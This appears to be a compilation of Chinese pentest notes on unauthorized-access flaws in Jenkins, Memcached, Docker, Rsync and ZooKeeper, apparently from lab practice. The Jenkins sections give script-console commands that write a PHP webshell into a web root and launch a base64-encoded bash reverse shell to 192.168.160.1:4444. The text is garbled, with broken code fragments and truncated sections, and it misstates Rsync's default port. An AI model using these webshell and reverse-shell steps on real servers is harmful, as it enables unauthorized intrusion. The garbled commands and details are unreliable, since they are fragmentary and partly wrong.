未授权总结 第1篇
1. println _wget -o /var/www/html/_.execute().text 2. new File(_/var/www/html/_).write(''); 3. def webshell = '' new File(_/var/www/html/_).write(_$webshell_); 4. def execute(cmd) { def proc = () () } execute( [ 'bash', '-c', 'echo -n _ /usr/local/nginx_1119/html/' ] ) execute( [ 'bash', '-c', 'echo __POST[s3cpu1se]);?>_ >> /usr/local/nginx_1119/html/' ] ) //xxxn 不要在最后自动换行
Result: 0 表示成功写入 Result: 1 表示目录不存在或者权限不足 写入失败 Result: 2 表示构造有异常 写入失败
漏洞加固
未授权总结 第2篇
(1) 漏洞简述:Memcached 是一套分布式高速缓存系统。它以 Key – Value 的形式将数据存储在内存中。这些数据通常是会被频繁地应用、读取的。正因为内存中数据的读取速度远远大于硬盘的读取速度所以可以用来加速应用的访问。由于 Memcached 的安全设计缺陷,客户端连接 Memcached 服务器后无需认证就可读取、修改服务器缓存内容。默认端口:11211
(2) 风险等级——高风险。
未授权总结 第3篇
(1) 漏洞简述Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台Docker 存在问题的版本分别为 和 因为权限控制等问题导致可以脱离容器拿到宿主机权限。
(2) 风险等级高风险。
(3) 漏洞编号无。
(4) 影响xxxocker 、Docker 。
先用 nmap 扫描查看端口开放情况。2375为 docker 端口如果存在漏洞会有以下情况url 输入 ip:2375/version 就会列出基本信息也可以执行目标服务器容器命令如 container、image 等。
(1) 使用 TLS 认证。
未授权总结 第4篇
(1) 漏洞简述:Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。
(2) 风险等级——高风险。
(4) 影响范围:Rsync 全版本。
未授权总结 第5篇
访问http://ip:8080/manage,不需要登录就可以访问,就存在漏洞。
访问 查看一下用户println 'whoami'.execute().text。
如果权限不够报错。靶机是ubuntu,开启jenkins服务新建一个jenkins用户,权限不太够。
靶机修改一下用户,用root运行,继续新建文件,无报错,可访问。
进行反弹shell。反弹命令进行编码:。
println 'bash -c {echo,YmFzaCAtaSA JiAvZGV2L3RjcC8xOTIuMTY4LjE2MC4xLzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i}'.execute().text
成功反弹。
未授权总结 第6篇
(2) 风险等级高风险。
(3) 漏洞编号无。
(4) 影响范围Zookeeper 全版本。
(1) 通过 nmap 扫描开放了 2181 端口的主机。
(2) 运行脚本通过 socket 连接 2181 端口并发送 envi 命令若服务端返回的数据中包含 ZooKeeper 的服务运行环境信息即可证明存在未授权访问。
检测脚本
修复方法
(1) 修改 ZooKeeper 默认端口,采用其他端口服务,配置服务来源地址限制策略。
(2) 增加 ZooKeeper 的认证配置。